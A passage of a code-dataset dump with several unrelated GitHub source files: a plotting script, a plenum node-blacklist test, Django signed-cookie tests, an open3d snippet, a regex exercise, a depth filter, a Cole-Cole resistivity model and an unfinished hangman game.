linestyle='dashed')\n\naxes.scatter(time_arr[volt_max_ind], volt_max, color='green')\n\naxes.scatter(x = charge_time, y = 0.0, color='green')\naxes.text(x=charge_time+0.1, y = 0.05, s=str(round(charge_time, 2)), fontsize = 12)\n\naxes.scatter(x = 0.0, y = volt_max, color = 'green')\naxes.text(x = 0.1, y = volt_max+0.05, s = str(round(volt_max, 2)), fontsize = 12)\n\naxes.text(x = (charge_time/2-0.8), y = volt_max/2, s = (\"Charge time: \" + str(round(charge_time, 2)) + \" s\"), color = 'blue', fontsize = 14)\naxes.text(x = (charge_time+discharge_time/2-0.8), y = volt_max/2, s = (\"Discharge time: \" + str(round(discharge_time, 2)) + \" s\"), color = 'red', fontsize = 14)\n\nfigure.savefig(\"graph.svg\")\n","repo_name":"Vladislave0-0/MIPT-engineering-training-courses","sub_path":"8#Data processing and plotting in Python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14750581010","text":"import pytest\n\nfrom stp_core.loop.eventually import eventually\nfrom plenum.common.messages.node_messages import Nomination\nfrom plenum.test import waits\n\nwhitelist = ['already got nomination',\n 'doing nothing for now']\n\n\n# noinspection PyIncorrectDocstring,PyUnusedLocal,PyShadowingNames\n@pytest.mark.skip(reason=\"SOV-540. Implementation changed.\")\ndef testBlacklistNodeOnMultipleNominations(looper, txnPoolNodeSet, ready):\n \"\"\"\n A node that sends multiple nominations must be blacklisted by other nodes\n \"\"\"\n A, B, C, D = txnPoolNodeSet\n\n # B sends more than 2 nominations\n for i in range(3):\n B.send(Nomination(D.name, 0, B.viewNo))\n\n # B should be blacklisted by A, C, D\n def chk():\n for node in A, C, D:\n assert node.isNodeBlacklisted(B.name)\n\n timeout = waits.expectedPoolNominationTimeout(len(txnPoolNodeSet))\n looper.run(eventually(chk, retryWait=1, timeout=timeout))\n","repo_name":"scipsycho/MADBTC","sub_path":"Indy/indy-plenum/plenum/test/blacklist/test_blacklist_node_on_multiple_nominations.py","file_name":"test_blacklist_node_on_multiple_nominations.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6307569465","text":"from datetime import timedelta\n\nfrom django.core import signing\nfrom django.http import HttpRequest, HttpResponse\nfrom django.test import SimpleTestCase, override_settings\nfrom django.test.utils import freeze_time\n\n\nclass SignedCookieTest(SimpleTestCase):\n def test_can_set_and_read_signed_cookies(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n self.assertIn(\"c\", response.cookies)\n self.assertTrue(response.cookies[\"c\"].value.startswith(\"hello:\"))\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value\n value = request.get_signed_cookie(\"c\")\n self.assertEqual(value, \"hello\")\n\n def test_can_use_salt(self):\n response = HttpResponse()\n response.set_signed_cookie(\"a\", \"hello\", salt=\"one\")\n request = HttpRequest()\n request.COOKIES[\"a\"] = response.cookies[\"a\"].value\n value = request.get_signed_cookie(\"a\", salt=\"one\")\n self.assertEqual(value, \"hello\")\n with self.assertRaises(signing.BadSignature):\n request.get_signed_cookie(\"a\", salt=\"two\")\n\n def test_detects_tampering(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n request = HttpRequest()\n request.COOKIES[\"c\"] = 
response.cookies[\"c\"].value[:-2] + \"$$\"\n with self.assertRaises(signing.BadSignature):\n request.get_signed_cookie(\"c\")\n\n def test_default_argument_suppresses_exceptions(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value[:-2] + \"$$\"\n self.assertIsNone(request.get_signed_cookie(\"c\", default=None))\n\n def test_max_age_argument(self):\n value = \"hello\"\n with freeze_time(123456789):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", value)\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value\n self.assertEqual(request.get_signed_cookie(\"c\"), value)\n\n with freeze_time(123456800):\n self.assertEqual(request.get_signed_cookie(\"c\", max_age=12), value)\n self.assertEqual(request.get_signed_cookie(\"c\", max_age=11), value)\n self.assertEqual(\n request.get_signed_cookie(\"c\", max_age=timedelta(seconds=11)), value\n )\n with self.assertRaises(signing.SignatureExpired):\n request.get_signed_cookie(\"c\", max_age=10)\n with self.assertRaises(signing.SignatureExpired):\n request.get_signed_cookie(\"c\", max_age=timedelta(seconds=10))\n\n def test_set_signed_cookie_max_age_argument(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"value\", max_age=100)\n self.assertEqual(response.cookies[\"c\"][\"max-age\"], 100)\n response.set_signed_cookie(\"d\", \"value\", max_age=timedelta(hours=2))\n self.assertEqual(response.cookies[\"d\"][\"max-age\"], 7200)\n\n @override_settings(SECRET_KEY=b\"\\xe7\")\n def test_signed_cookies_with_binary_key(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value\n self.assertEqual(request.get_signed_cookie(\"c\"), \"hello\")\n","repo_name":"django/django","sub_path":"tests/signed_cookies_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"6048296353","text":"# Colors:\r\nRED = [1., 0., 0.]\r\nGREEN = [0., 1., 0.]\r\nBLUE = [0., 0., 1.]\r\nYELLOW = [1., 1., 0.]\r\nMAGENTA = [1., 0., 1.]\r\nCYAN = [0., 1., 1.]\r\n\r\npositions = [x_max, y_max, z_max, x_min, y_min, z_min]\r\ncolors = [RED, GREEN, BLUE, MAGENTA, YELLOW, CYAN]\r\nfor i in range(len(positions)):\r\n # Create a sphere mesh:\r\n sphere = o3d.geometry.TriangleMesh.create_sphere(radius=0.05)\r\n # move to the point position:\r\n sphere.translate(np.asarray(positions[i]))\r\n # add color:\r\n sphere.paint_uniform_color(np.asarray(colors[i]))\r\n # compute normals for vertices or faces:\r\n sphere.compute_vertex_normals()\r\n # add to geometry list to display later:\r\n geometries.append(sphere)\r\n\r\n# Display:\r\no3d.visualization.draw_geometries(geometries)","repo_name":"enesgokdemir/visualize-point-clouds","sub_path":"draw_spheres.py","file_name":"draw_spheres.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"36465264375","text":"#\n# * Intro 54, Sum Up Numbers\n# * Medium\n\n# * CodeMaster has just returned from shopping. He scanned the check of the items \n# * he bought and gave the resulting string to Ratiorg to figure out the total \n# * number of purchased items. 
Since Ratiorg is a bot he is definitely going to \n# * automate it, so he needs a program that sums up all the numbers which appear \n# * in the given input.\n\n# Help Ratiorg by writing a function that returns the sum of numbers that appear \n# in the given inputString.\n\n# * Example\n\n# For inputString = \"2 apples, 12 oranges\", the output should be\n# sumUpNumbers(inputString) = 14.\n\n# * Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string inputString\n\n# Guaranteed constraints:\n# 0 ≤ inputString.length ≤ 10^5.\n\n# [output] integer\n\n\n#%%\n\n# * Solution 1\nimport re\ndef sumUpNumbers(inputString: str) -> int:\n    findings = re.findall(r'\\d+', inputString)\n    print(findings)\n    return sum([int(x) for x in findings])\n\n\n\na1 = '2 apples, 12 oranges'\ne1 = 14\nr1 = sumUpNumbers(a1)\nprint('For {}, expected: {}, result:{}'.format(a1, e1, r1))\n\n\n# %%\n","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Intro/Intro54SumUpNumbers.py","file_name":"Intro54SumUpNumbers.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17113514670","text":"'''\nAuthor: Alex Reichenbach\nDate: May 7, 2022\n'''\nimport cv2\nimport numpy as np\n\nfrom usac.filters.filter import Filter\nfrom usac.data.rgbd_image import RGBD_Image\n\nclass NormalFilter(Filter):\n    def __init__(self, cfg):\n        self.cfg = cfg\n\n    def _filter_image(self, rgbd: RGBD_Image) -> np.ndarray:\n        '''\n        r, c = i, j are origin \n\n        0) Left, (r, c - 1)\n        1) Left up, (r - 1, c - 1)\n        2) Up, (r - 1, c)\n        3) Up right, (r - 1, c + 1)\n        4) Right, (r, c + 1)\n        5) Right Down, (r + 1, c + 1)\n        6) Down, (r + 1, c)\n        7) Down Left, (r + 1, c - 1)\n        '''\n        rows, cols = rgbd.depth.shape\n\n        # zx = cv2.Sobel(rgbd.depth, cv2.CV_64F, 1, 0, ksize=5) \n        # zy = cv2.Sobel(rgbd.depth, cv2.CV_64F, 0, 1, ksize=5)\n\n        zx, zy = np.gradient(rgbd.depth)\n\n        zx = zx.clip(-self.cfg.max_grad, self.cfg.max_grad)\n        zy = zy.clip(-self.cfg.max_grad, self.cfg.max_grad)\n\n        zx -= zx.min()\n        zy -= zy.min()\n        zx /= zx.max()\n        zy /= zy.max()\n\n\n        return np.stack([zx, zy])\n","repo_name":"Reichenbachian/UnsupervisedSegmentation","sub_path":"usac/filters/normals.py","file_name":"normals.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70580911147","text":"# *-* coding: utf-8 *-*\n\"\"\" Cole-Cole model (resistivity/resistance formulation) after Pelton et al.\n1978\n\nPelton, W., Ward, S., Hallof, P., Sill, W., and Nelson, P. (1978). Mineral\ndiscrimination and removal of inductive coupling with multifrequency ip.\nGeophysics, 43(3):588–609.\n\"\"\"\nimport numpy as np\nimport sip_models.sip_response as sip_response\n\n\ndef _make_list(number_or_list):\n    # return the object enclosed in a list if it's not a tuple or list\n    if isinstance(number_or_list, (tuple, list)):\n        return number_or_list\n    else:\n        return [number_or_list, ]\n\n\nclass cc_base(object):\n    \"\"\" Base class for Cole-Cole objects (both resistivity and conductivity)\n    \"\"\"\n    def __init__(self, frequencies):\n        self.f = frequencies\n\n    def _sort_parameters(self, parameters):\n        # type 1\n        if isinstance(parameters, (list, tuple, np.ndarray)):\n            
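# flat layout (documented in _set_parameters below): [rho0, m1..mN,\n            # tau1..tauN, c1..cN], hence the term count is (len(pars) - 1) / 3.\n            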
\n\n\n# %%\n","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Intro/Intro54SumUpNumbers.py","file_name":"Intro54SumUpNumbers.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17113514670","text":"'''\nAuthor: Alex Reichenbach\nDate: May 7, 2022\n'''\nimport cv2\nimport numpy as np\n\nfrom usac.filters.filter import Filter\nfrom usac.data.rgbd_image import RGBD_Image\n\nclass NormalFilter(Filter):\n    def __init__(self, cfg):\n        self.cfg = cfg\n\n    def _filter_image(self, rgbd: RGBD_Image) -> np.ndarray:\n        '''\n        r, c = i, j are origin \n\n        0) Left, (r, c - 1)\n        1) Left up, (r - 1, c - 1)\n        2) Up, (r - 1, c)\n        3) Up right, (r - 1, c + 1)\n        4) Right, (r, c + 1)\n        5) Right Down, (r + 1, c + 1)\n        6) Down, (r + 1, c)\n        7) Down Left, (r + 1, c - 1)\n        '''\n        rows, cols = rgbd.depth.shape\n\n        # zx = cv2.Sobel(rgbd.depth, cv2.CV_64F, 1, 0, ksize=5) \n        # zy = cv2.Sobel(rgbd.depth, cv2.CV_64F, 0, 1, ksize=5)\n\n        zx, zy = np.gradient(rgbd.depth)\n\n        zx = zx.clip(-self.cfg.max_grad, self.cfg.max_grad)\n        zy = zy.clip(-self.cfg.max_grad, self.cfg.max_grad)\n\n        zx -= zx.min()\n        zy -= zy.min()\n        zx /= zx.max()\n        zy /= zy.max()\n\n\n        return np.stack([zx, zy])\n","repo_name":"Reichenbachian/UnsupervisedSegmentation","sub_path":"usac/filters/normals.py","file_name":"normals.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70580911147","text":"# *-* coding: utf-8 *-*\n\"\"\" Cole-Cole model (resistivity/resistance formulation) after Pelton et al.\n1978\n\nPelton, W., Ward, S., Hallof, P., Sill, W., and Nelson, P. (1978). Mineral\ndiscrimination and removal of inductive coupling with multifrequency ip.\nGeophysics, 43(3):588–609.\n\"\"\"\nimport numpy as np\nimport sip_models.sip_response as sip_response\n\n\ndef _make_list(number_or_list):\n    # return the object enclosed in a list if it's not a tuple or list\n    if isinstance(number_or_list, (tuple, list)):\n        return number_or_list\n    else:\n        return [number_or_list, ]\n\n\nclass cc_base(object):\n    \"\"\" Base class for Cole-Cole objects (both resistivity and conductivity)\n    \"\"\"\n    def __init__(self, frequencies):\n        self.f = frequencies\n\n    def _sort_parameters(self, parameters):\n        # type 1\n        if isinstance(parameters, (list, tuple, np.ndarray)):\n            pars = np.atleast_1d(parameters)\n            nr_pars = int((pars.shape[0] - 1) / 3)\n\n            rho0 = pars[0]\n            m = pars[1:nr_pars + 1]\n            tau = pars[nr_pars + 1: 2 * nr_pars + 1]\n            c = pars[2 * nr_pars + 1:]\n\n        elif isinstance(parameters, dict):\n            rho0 = parameters['rho0']\n            m = _make_list(parameters['m'])\n            tau = _make_list(parameters['tau'])\n            c = _make_list(parameters['c'])\n        else:\n            print(parameters)\n            raise Exception('Input format not recognized')\n\n        return rho0, m, tau, c\n\n    def _set_parameters(self, parameters):\n        \"\"\"Sort out the various possible parameter inputs and return a config\n        object (dict)\n\n        We have multiple input formats:\n\n        1) a list, tuple, or numpy.ndarray, containing the linear parameters\n        in the following order:\n            * for single term: rho0, m1, tau1, c1\n            * for multiple terms: rho0, m1, m2, ..., tau1, tau2, ..., c1, c2, ...\n\n        2) a dictionary with the entries \"rho0\", \"m\", \"tau\", \"c\"\n\n        2b) if the dictionary entries for \"m\", \"tau\", and \"c\" are lists, the\n        entries correspond to multiple polarisation terms\n\n        \"\"\"\n        nr_f = self.f.size\n\n        # sort out parameters\n        rho0, m, tau, c = self._sort_parameters(parameters)\n\n        newsize = (nr_f, len(m))\n        # rho0_resized = np.resize(rho0, newsize)\n        m_resized = np.resize(m, newsize)\n        tau_resized = np.resize(tau, newsize)\n        c_resized = np.resize(c, newsize)\n\n        omega = np.atleast_2d(2 * np.pi * self.f).T\n        self.w = np.resize(omega, (len(m), nr_f)).T\n        self.rho0 = rho0\n        self.m = m_resized\n        self.tau = tau_resized\n        self.c = c_resized\n\n        # compute some common terms\n        self.otc = (self.w * self.tau) ** self.c\n        self.otc2 = (self.w * self.tau) ** (2 * self.c)\n        self.ang = self.c * np.pi / 2.0  # rad\n        self.denom = 1 + 2 * self.otc * np.cos(self.ang) + self.otc2\n\n\nclass cc(cc_base):\n\n    def response(self, parameters):\n        r\"\"\"Complex response of the Cole-Cole model::\n        :math:`\\hat{\\rho} = \\rho_0 \\left(1 - \\sum_i m_i (1 - \\frac{1}{1 + (j\n        \\omega \\tau_i)^c_i})\\right)`\n\n        Parameters\n        ----------\n        parameters: list or tuple or numpy.ndarray\n            Cole-Cole model parameters: rho0, m, tau, c (all linear)\n\n        Returns\n        -------\n        response: :class:`sip_models.sip_response.sip_response`\n            model response object\n        \"\"\"\n        # get a config object\n        self._set_parameters(parameters)\n        terms = self.m * (1 - (1 / (1 + (1j * self.w * self.tau) ** self.c)))\n        # sum up terms\n        specs = np.sum(terms, axis=1)\n        rcomplex = self.rho0 * (1 - specs)\n        response = sip_response.sip_response(self.f, rcomplex=rcomplex)\n\n        return response\n\n    def dre_drho0(self, pars):\n        r\"\"\" Compute partial derivative of real parts with respect to\n        :math:`\\rho_0`\n\n        :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial \\rho_0} = 1 -\n        \\frac{m (\\omega \\tau)^c (cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^c)}{1 + 2\n        (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n\n        
Note that partial derivatives towards :math:`\\rho_0` are 1D, in\n contrast to the other parameter derivatives, which usually return 2D\n arrays!\n\n Returns\n -------\n dre_drho0: :class:`numpy.ndarray`\n Size N (nr of frequencies) array with the derivatives\n\n \"\"\"\n self._set_parameters(pars)\n numerator = self.m * self.otc * (np.cos(self.ang) + self.otc)\n term = numerator / self.denom\n specs = np.sum(term, axis=1)\n\n result = 1 - specs\n return result\n\n def dre_dlog10rho0(self, pars):\n \"\"\"Compute partial derivative of real parts to log10(rho0)\n \"\"\"\n\n # first call the linear response to set the parameters\n linear_response = self.dre_drho0(pars)\n result = np.log(10) * self.rho0 * linear_response\n return result\n\n def dre_dm(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial m} = - \\rho_0 m\n (\\omega \\tau)^c \\frac{(cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^c)}{1 + 2\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n \"\"\"\n self._set_parameters(pars)\n numerator = -self.otc * (np.cos(self.ang) + self.otc)\n result = numerator / self.denom\n result *= self.rho0\n return result\n\n def dre_dlog10m(self, pars):\n lin_response = self.dre_dm(pars)\n result = np.log(10) * self.m * lin_response\n return result\n\n def dre_dtau(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial \\tau} = \\rho_0\n \\frac{-m \\omega^c c \\tau^{c-1} cos(\\frac{c \\pi}{2} - m \\omega^{2 c} 2 c\n \\tau^{2c - 1}}{1 + 2 (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega\n \\tau)^{2 c}} +\n \\rho_0 \\frac{\\left[m (\\omega \\tau)^c (cos(\\frac{c \\pi}{2}) + (\\omega\n \\tau)^c) \\right] \\cdot \\left[ 2 \\omega^c c \\tau^{c-1} cos(\\frac{c\n \\pi}{2}) + 2 c \\omega^{2 c} \\tau^{2 c - 1}\\right]}{\\left[1 + 2 (\\omega\n \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n \"\"\"\n self._set_parameters(pars)\n # term1\n nom1 = - self.m * self.c * self.w ** self.c * self.tau ** \\\n (self.c - 1) *\\\n np.cos(self.ang) - self.m * self.w ** (2 * self.c) *\\\n 2 * self.c * self.tau ** (2 * self.c - 1)\n term1 = nom1 / self.denom\n\n # term2\n nom2 = self.m * self.otc * (np.cos(self.ang) + self.otc) *\\\n (2 * self.w ** self.c * self.c * self.tau ** (self.c - 1) *\n np.cos(self.ang) + 2 * self.c * self.w ** (2 * self.c) *\n self.tau ** (2 * self.c - 1))\n term2 = nom2 / self.denom ** 2\n\n result = term1 + term2\n result *= self.rho0\n return result\n\n def dre_dlog10tau(self, pars):\n lin_response = self.dre_dtau(pars)\n result = np.log(10) * self.tau * lin_response\n return result\n\n def dre_dc(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial c} = \\rho_0\n \\frac{-m ln(\\omega \\tau) (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + m\n (\\omega\\tau)^c \\frac{\\pi}{2} sin(\\frac{c \\pi}{2}) + ln(\\omega\n \\tau)(\\omega \\tau)^c}{1 + 2 (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) +\n (\\omega \\tau)^{2 c}} +\n \\rho_0 \\frac{\\left[-m (\\omega \\tau)^c (cos(\\frac{c \\pi}{2}) + (\\omega\n \\tau)^c) \\right] \\cdot \\left[ -2 ln(\\omega \\tau) (\\omega \\tau)^c\n cos(\\frac{c \\pi}{2}) + 2 (\\omega \\tau)^c \\frac{\\pi}{2} cos(\\frac{c\n \\pi}{2} + 2 ln(\\omega \\tau) (\\omega \\tau)^{2 c}\\right]}{\\left[1 + 2\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n \"\"\"\n self._set_parameters(pars)\n # term1\n nom1 = - self.m * np.log(self.w * self.tau) * self.otc *\\\n np.cos(self.ang) +\\\n self.m * self.otc * (np.pi / 2.0) *\\\n np.sin(self.ang) 
-\\\n 2 * self.m * np.log(self.w * self.tau) *\\\n self.otc2\n term1 = nom1 / self.denom\n\n # term2\n nom2 = (self.m * self.otc * (np.cos(self.ang) + self.otc)) *\\\n (2 * np.log(self.w * self.tau) * self.otc * np.cos(self.ang) -\n 2 * self.otc * (np.pi / 2.0) * np.sin(self.ang) +\n 2 * np.log(self.w * self.tau) * self.otc2)\n term2 = nom2 / self.denom ** 2\n\n result = term1 + term2\n result *= self.rho0\n return result\n\n def dim_drho0(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho}''(\\omega)}{\\partial \\rho_0} = -\n \\frac{m (\\omega \\tau)^c sin(\\frac{c \\pi}{2})}{1 + 2\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n \"\"\"\n self._set_parameters(pars)\n\n result = np.sum(- self.m * self.otc * np.sin(self.ang) / self.denom,\n axis=1)\n\n return result\n\n def dim_dlog10rho0(self, pars):\n lin_resp = self.dim_drho0(pars)\n result = np.log(10) * self.rho0 * lin_resp\n return result\n\n def dim_dm(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho''}(\\omega)}{\\partial m} = - \\rho_0 m\n (\\omega \\tau)^c \\frac{sin(\\frac{c \\pi}{2})}{1 + 2 (\\omega \\tau)^c\n cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n \"\"\"\n self._set_parameters(pars)\n numerator = -self.otc * np.sin(self.ang)\n result = numerator / self.denom\n result *= self.rho0\n return result\n\n def dim_dlog10m(self, pars):\n lin_response = self.dim_dm(pars)\n result = np.log(10) * self.m * lin_response\n return result\n\n def dim_dtau(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho''}(\\omega)}{\\partial \\tau} = \\rho_0\n \\frac{-m \\omega^c c \\tau^{c-1} sin(\\frac{c \\pi}{2} }{1 + 2 (\\omega\n \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}} +\n \\rho_0 \\frac{\\left[-m (\\omega \\tau)^c sin(\\frac{c \\pi}{2}\n \\right] \\cdot \\left[ 2 \\omega^c c \\tau^{c-1} cos(\\frac{c\n \\pi}{2}) + 2 c \\omega^{2 c} \\tau^{2 c - 1}\\right]}{\\left[1 + 2 (\\omega\n \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n \"\"\"\n self._set_parameters(pars)\n # term1\n nom1 = - self.m * np.sin(self.ang) * self.w ** self.c *\\\n self.c * self.tau ** (self.c - 1)\n term1 = nom1 / self.denom\n\n # term2\n nom2 = (self.m * self.otc * np.sin(self.ang)) *\\\n (2 * self.w ** self.c * self.c * self.tau ** (self.c - 1) *\n np.cos(self.ang) + 2 * self.c * self.w ** (2 * self.c) *\n self.tau ** (2 * self.c - 1))\n term2 = nom2 / self.denom ** 2\n\n result = term1 + term2\n result *= self.rho0\n return result\n\n def dim_dlog10tau(self, pars):\n lin_resp = self.dim_dtau(pars)\n result = np.log(10) * self.tau * lin_resp\n return result\n\n def dim_dc(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho''}(\\omega)}{\\partial c} = \\rho_0\n \\frac{-m sin(\\frac{c \\pi}{2}) ln(\\omega \\tau)(\\omega \\tau)^c - m\n (\\omega \\tau)^c \\frac{\\pi}{2} cos(\\frac{\\pi}{2}}{1 + 2 (\\omega \\tau)^c\n cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}} + \\rho_0 \\frac{\\left[-m\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) \\right] \\cdot \\left[ -2 ln(\\omega\n \\tau) (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + 2 (\\omega \\tau)^c\n \\frac{\\pi}{2} cos(\\frac{c \\pi}{2}) \\right] + \\left[2 ln(\\omega \\tau)\n (\\omega \\tau)^{2 c}\\right]}{\\left[1 + 2 (\\omega \\tau)^c cos(\\frac{c\n \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n \"\"\"\n self._set_parameters(pars)\n # term1\n nom1a = - self.m * np.log(self.w * self.tau) * self.otc *\\\n np.sin(self.ang)\n nom1b = - self.m * self.otc * (np.pi / 2.0) * np.cos(self.ang)\n term1 = (nom1a + nom1b) / self.denom\n\n # 
term2\n nom2 = (self.m * self.otc * np.sin(self.ang)) *\\\n (2 * np.log(self.w * self.tau) * self.otc * np.cos(self.ang) -\n 2 * self.otc * (np.pi / 2.0) * np.sin(self.ang) +\n 2 * np.log(self.w * self.tau) * self.otc2)\n term2 = nom2 / self.denom ** 2\n result = term1 + term2\n\n result *= self.rho0\n return result\n\n def Jacobian_re_im(self, pars):\n r\"\"\"\n :math:`J`\n\n >>> import sip_models.res.cc as cc\n >>> import numpy as np\n >>> f = np.logspace(-3, 3, 20)\n >>> pars = [100, 0.1, 0.04, 0.8]\n >>> obj = cc.cc(f)\n >>> J = obj.Jacobian_re_im(pars)\n \"\"\"\n partials = []\n\n # partials.append(self.dre_dlog10rho0(pars)[:, np.newaxis, :])\n partials.append(self.dre_drho0(pars)[:, np.newaxis])\n partials.append(self.dre_dm(pars))\n # partials.append(self.dre_dlog10tau(pars))\n partials.append(self.dre_dtau(pars))\n partials.append(self.dre_dc(pars))\n # partials.append(self.dim_dlog10rho0(pars)[:, np.newaxis, :])\n partials.append(self.dim_drho0(pars)[:, np.newaxis])\n partials.append(self.dim_dm(pars))\n # partials.append(self.dim_dlog10tau(pars))\n partials.append(self.dim_dtau(pars))\n partials.append(self.dim_dc(pars))\n\n print('SHAPES')\n for x in partials:\n print(x.shape)\n\n J = np.concatenate(partials, axis=1)\n return J\n","repo_name":"m-weigand/sip_models","sub_path":"lib/sip_models/res/cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26239500912","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 8 20:22:38 2019\r\n\r\n@author: Kay\r\n\"\"\"\r\n\r\nfrom random import *\r\n\r\nplayer_score = 0;\r\ncomputer_score = 0;\r\n\r\ndef hangedman(hangman) :\r\n graphic = [\r\n \"\"\"\r\n +-------+\r\n |\r\n |\r\n |\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\"\r\n ,\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n |\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | |\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | -|\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | -|-\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | -|-\r\n | /\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\"\r\n +-------+\r\n | |\r\n | O \r\n | -|-\r\n | / \\\r\n |\r\n --------------\r\n --------------\r\n \"\"\"]\r\n \r\n print(graphic[hangman])\r\n return\r\n\r\ndef start() :\r\n print(\"Let's play a game of Hangman.\")\r\n #'game()' calls the game function and starts the actual game.\r\n while game() : \r\n pass; #Keeps track of the scores until the game is finished.\r\n scores(); #Once the game is completed it'll return the scores\r\n \r\ndef game() :\r\n dictionary = [\"anata\", \"baka\", \"namae\", \"boku\", \"mina\"];\r\n \r\n word = choice(dictionary); #Choose random number and call word based on index number. 
'choice' comes from random import\r\n    word_length = len(word);\r\n    clue = word_length * [\"_\"]; #For each letter print '_'\r\n    \r\n    tries = 6; #Sets the amount of tries the user gets.\r\n    letters_tried = \"\";\r\n    guesses = 0; #Guesses by default should be 0.\r\n    letters_right = 0;\r\n    letters_wrong = 0;\r\n    \r\n    global computer_score, player_score;\r\n    \r\n    while (letters_wrong != tries) and (\"\".join(clue) != word): #Keep looping while the user still has tries left and their clue is not fully filled. \r\n        letter = guess_letter(); #Calls the guess_letter function below.\r\n        if len(letter) == 1 and letter.isalpha(): #Only accept a single alphabetical character.\r\n            if letters_tried.find(letter) != -1: #If you've entered a letter more than once it'll look through the string you entered and if it's there it'll return the message.\r\n                print(\"You've already picked\", letter);\r\n            else:\r\n                letters_tried = letters_tried + letter; #Adds the letters the user entered to the letters tried var.\r\n                first_index = word.find(letter) #It looks for the first occurrence (the lowest value being index 0) in the word. If the letter is not found it returns the int -1.\r\n                if first_index == -1: #If the search returns the value -1 the guess was wrong.\r\n                    letters_wrong += 1; #Adds a number to the letters wrong. Remember once this reaches the number of tries it's game over.\r\n                    print(\"Sorry,\",letter,\"isn't what we're looking for.\");\r\n                else:\r\n                    print(\"Congratulations\" ,letter, \"is correct.\"); #Prints if the user got something correct.\r\n                    for i in range(word_length): #Loops through the array for each letter\r\n                        if letter == word[i]: #If the letter matches with any letter in the array 'word'(The correct word) the function runs.\r\n                            clue[i] = letter; #The letter will replace the clue(_) at that index. Example (____) the correct word is (mina). Index[1] is replaced so this will return (_i__).\r\n        else:\r\n            print(\"Choose another.\"); #Runs if the entered value is not a single letter.\r\n        